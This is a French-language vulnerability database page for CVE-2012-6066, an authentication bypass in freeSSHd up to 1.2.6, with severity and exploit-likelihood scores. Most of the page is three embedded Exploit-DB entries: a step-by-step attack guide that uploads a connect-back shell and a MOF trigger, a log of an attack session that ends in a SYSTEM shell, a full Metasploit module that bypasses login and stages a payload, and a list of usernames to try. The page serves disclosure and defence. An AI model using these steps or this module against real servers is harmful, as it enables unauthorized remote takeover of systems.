CVE-2012-6066 : Détail

CVE-2012-6066

Authorization problems
A07-Identif. and Authent. Fail
71.24%V4
Network
2012-12-04
23h00 +00:00
2024-09-17
02h32 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

freeSSHd.exe in freeSSHd through 1.2.6 allows remote attackers to bypass authentication via a crafted session, as demonstrated by an OpenSSH client with modified versions of ssh.c and sshconnect2.c.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-287 Improper Authentication
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 23079

Date de publication : 2012-12-01 23h00 +00:00
Auteur : kingcope
EDB Vérifié : Yes

FreeFTPD all versions Remote System Level Exploit Zero-Day -- No username needed, straightforward rooting! Discovered & Exploited By Kingcope Year 2011 -- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23079.zip Example banner: WeOnlyDo-wodFTPD 2.3.6.165 This package includes all you need to successfully root any version of FreeFTPD: * Modified version of ssh.exe (FreeFTPD authentication bypass) * sftp.exe for connecting to the server * nullevent.exe connect back shell that is uploaded to the server * nullevent.mof file which is uploaded to the server to execute the connect back shell * MSVCR100.dll that is needed by nullevent.exe * scan logs for your pleasure! We make use of the STUXNET technique to execute code, So let's go: 1.) Setup a netcat on a host you have, firewall open on the listening port 2.) modify nullevent.mof in an editor (where the ip and port is) according to your netcat config 3.) connect to the FreeSSHD: sftp.exe -S ./ssh.exe <ip/host> 4.) upload (put) nullevent.exe: put nullevent.exe 5.) upload (put) MSVCR100.dll: put MSVCR100.dll 6.) upload (put) nullevent.mof to wbem/mof/nullevent.mof: put nullevent.mof wbem/mof/nullevent.mof 7.) Enjoy your system shell which will blink up on you netcat after 1 minute!! 8.) Cleanup by deleting nullevent.exe located in c:\windows\system32\ 8.) Enjoy! 9.) Enjoy! 10.) Enjoy! Example exploitation session: C:\Users\KC\Desktop\FreeFTPD_0day>sftp -S ./ssh.exe 83.241.214.171 Could not create directory '/home/KC/.ssh'. The authenticity of host '83.241.214.171 (83.241.214.171)' can't be established. RSA key fingerprint is a8:ba:6d:0a:c6:ae:8b:a1:b6:47:7b:43:a8:de:4b:8e. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/KC/.ssh/known_hosts). Connected to 83.241.214.171. sftp> put nullevent.exe Uploading nullevent.exe to /nullevent.exe nullevent.exe 100% 7168 7.0KB/s 00:00 sftp> put MSVCR100.dll Uploading MSVCR100.dll to /MSVCR100.dll MSVCR100.dll 100% 751KB 22.8KB/s 00:33 sftp> put nullevent.mof wbem/mof/nullevent.mof Uploading nullevent.mof to /wbem/mof/nullevent.mof nullevent.mof 100% 691 0.7KB/s 00:00 sftp> [root@vs2067037 ~]# nc -v -l 443 Connection from 83.231.224.193 port 443 [tcp/https] accepted Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>whoami whoami nt authority\system
Exploit Database EDB-ID : 24133

Date de publication : 2013-01-14 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

require 'msf/core' require 'tempfile' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Freesshd Authentication Bypass", 'Description' => %q{ This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Aris', # Vulnerability discovery and Exploit 'kcope', # 2012 Exploit 'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module ], 'References' => [ [ 'CVE', '2012-6066' ], [ 'OSVDB', '88006' ], [ 'BID', '56785' ], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ], [ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ] ], 'Platform' => 'win', 'Privileged' => true, 'DisclosureDate' => "Aug 11 2010", 'Targets' => [ [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ] ], 'DefaultTarget' => 0 )) register_options( [ OptInt.new('RPORT', [false, 'The target port', 22]), OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator']) ], self.class) end def load_netssh begin require 'net/ssh' return true rescue LoadError return false end end def check connect banner = sock.recv(30) disconnect if banner =~ /SSH-2.0-WeOnlyDo/ version=banner.split(" ")[1] return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def upload_payload(connection) exe = generate_payload_exe filename = rand_text_alpha(8) + ".exe" cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe) opts = { :linemax => 1700, :decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"), } cmds = cmdstager.generate(opts) if (cmds.nil? or cmds.length < 1) print_error("The command stager could not be generated") raise ArgumentError end cmds.each { |cmd| ret = connection.exec!("cmd.exe /c "+cmd) } end def setup_ssh_options pass=rand_text_alpha(8) options={ :password => pass, :port => datastore['RPORT'], :timeout => 1, :proxies => datastore['Proxies'], :key_data => OpenSSL::PKey::RSA.new(2048).to_pem } return options end def do_login(username,options) print_status("Trying username "+username) options[:username]=username transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options) auth = Net::SSH::Authentication::Session.new(transport, options) auth.authenticate("ssh-connection", username, options[:password]) connection = Net::SSH::Connection::Session.new(transport, options) begin Timeout.timeout(10) do connection.exec!('cmd.exe /c echo') end rescue RuntimeError return nil rescue Timeout::Error print_status("Timeout") return nil end return connection end def exploit # # Load net/ssh so we can talk the SSH protocol # has_netssh = load_netssh if not has_netssh print_error("You don't have net/ssh installed. Please run gem install net-ssh") return end options=setup_ssh_options connection = nil usernames=datastore['USERNAMES'].split(' ') usernames.each { |username| connection=do_login(username,options) break if connection } if connection print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)") upload_payload(connection) handler end end end
Exploit Database EDB-ID : 23080

Date de publication : 2012-12-01 23h00 +00:00
Auteur : kingcope
EDB Vérifié : Yes

FreeSSHD all version Remote Authentication Bypass ZERODAY Discovered & Exploited by Kingcope Year 2011 # Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23080.zip Run like: ssh.exe -l<valid username> <host> valid username might be: root admin administrator webadmin sysadmin netadmin guest user web test ssh sftp ftp or anything you can imagine. The vulnerable banner of the most recent version is: SSH-2.0-WeOnlyDo 2.1.3 For your pleasure, KingcopeFreeSSHD all version Remote Authentication Bypass ZERODAY Discovered & Exploited by Kingcope Year 2011 Run like: ssh.exe -l<valid username> <host> valid username might be: root admin administrator webadmin sysadmin netadmin guest user web test ssh sftp ftp or anything you can imagine. The vulnerable banner of the most recent version is: SSH-2.0-WeOnlyDo 2.1.3 For your pleasure, Kingcope

Products Mentioned

Configuraton 0

Freesshd>>Freesshd >> Version To (including) 1.2.6

Freesshd>>Freesshd >> Version 1.2.1

Freesshd>>Freesshd >> Version 1.2.2

Références

Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.